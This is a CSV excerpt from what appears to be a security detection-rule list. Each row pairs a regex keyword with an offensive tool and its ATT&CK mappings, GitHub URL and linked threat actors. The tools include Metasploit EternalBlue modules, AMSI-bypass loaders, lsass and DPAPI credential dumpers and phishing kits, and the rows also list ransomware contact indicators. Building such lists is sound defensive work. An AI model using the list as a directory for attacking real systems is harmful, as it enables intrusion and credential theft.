"*Mr-B0b/SpaceRunner*",".{0,1000}Mr\-B0b\/SpaceRunner.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","52315"
"*Mr-Cyb3rgh0st/Excel-Exploit*",".{0,1000}Mr\-Cyb3rgh0st\/Excel\-Exploit.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","52316"
"*mrd0x/BITB*",".{0,1000}mrd0x\/BITB.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","52317"
"*mrd0x/PWA-Phishing*",".{0,1000}mrd0x\/PWA\-Phishing.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","52318"
"*mremoteng_decrypt.py*",".{0,1000}mremoteng_decrypt\.py.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","8","2","146","42","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z","52319"
"*mremoteng_decrypt.py*",".{0,1000}mremoteng_decrypt\.py.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","52320"
"*mRemoteNG-local.py*",".{0,1000}mRemoteNG\-local\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","52321"
"*MrEmpy/Reaper*",".{0,1000}MrEmpy\/Reaper.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","52322"
"*Mr-Un1k0d3r/DKMC*",".{0,1000}Mr\-Un1k0d3r\/DKMC.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","52324"
"*mrv44idagzu47oktcipn6tlll6nzapi6pk3u7ehsucl4hpxon45dl4yd.onion*",".{0,1000}mrv44idagzu47oktcipn6tlll6nzapi6pk3u7ehsucl4hpxon45dl4yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52325"
"*ms.heisenberg@aol.com*",".{0,1000}ms\.heisenberg\@aol\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52326"
"*ms_teams_exports_usernev_dll.txt*",".{0,1000}ms_teams_exports_usernev_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","52327"
"*ms04_007_killbill.*",".{0,1000}ms04_007_killbill\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52328"
"*ms14-068.py -u *",".{0,1000}ms14\-068\.py\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","52329"
"*ms14-068.py -u*",".{0,1000}ms14\-068\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","52330"
"*ms14-068_check*",".{0,1000}ms14\-068_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52331"
"*ms16_075_reflection_juicy.rb*",".{0,1000}ms16_075_reflection_juicy\.rb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","52332"
"*ms17_010_eternalblue*",".{0,1000}ms17_010_eternalblue.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52333"
"*ms17_010_eternalblue.*",".{0,1000}ms17_010_eternalblue\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52334"
"*ms17_010_psexec*",".{0,1000}ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52335"
"*ms17_010_psexec.*",".{0,1000}ms17_010_psexec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52336"
"*MS17-010*",".{0,1000}MS17\-010.{0,1000}","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tool","https://github.com/worawit/MS17-010","1","0","N/A","N/A","N/A","10","2182","1098","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z","52337"
"*ms17-010_check*",".{0,1000}ms17\-010_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52338"
"*MSBuild.exe NetLoader.xml*",".{0,1000}MSBuild\.exe\sNetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","52339"
"*MSBuildShell*",".{0,1000}MSBuildShell.{0,1000}","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","N/A","3","287","74","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z","52340"
"*MScholtes/PS2EXE*",".{0,1000}MScholtes\/PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","52341"
"*msf*/logs/framework.log*",".{0,1000}msf.{0,1000}\/logs\/framework\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52345"
"*msf_api_doc.rb*",".{0,1000}msf_api_doc\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52346"
"*msf_cve_extracter.py*",".{0,1000}msf_cve_extracter\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","52347"
"*msf_exec.py*",".{0,1000}msf_exec\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52348"
"*msf_matchers*",".{0,1000}msf_matchers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52349"
"*msf_payload.ps1*",".{0,1000}msf_payload\.ps1.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","52350"
"*MSF_WS_JSON_RPC_API_TOKEN*",".{0,1000}MSF_WS_JSON_RPC_API_TOKEN.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","52351"
"*msf-auxiliarys*",".{0,1000}msf\-auxiliarys.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","52352"
"*msfcallback.bin*",".{0,1000}msfcallback\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","52353"
"*msfconsole *",".{0,1000}msfconsole\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52354"
"*msfconsole*",".{0,1000}msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52355"
"*msfconsole.*",".{0,1000}msfconsole\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52356"
"*msfconsole_spec*",".{0,1000}msfconsole_spec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52357"
"*msfcrawler.*",".{0,1000}msfcrawler\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52358"
"*msfd.rb*",".{0,1000}msfd\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52359"
"*msfdb --component*",".{0,1000}msfdb\s\-\-component.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52360"
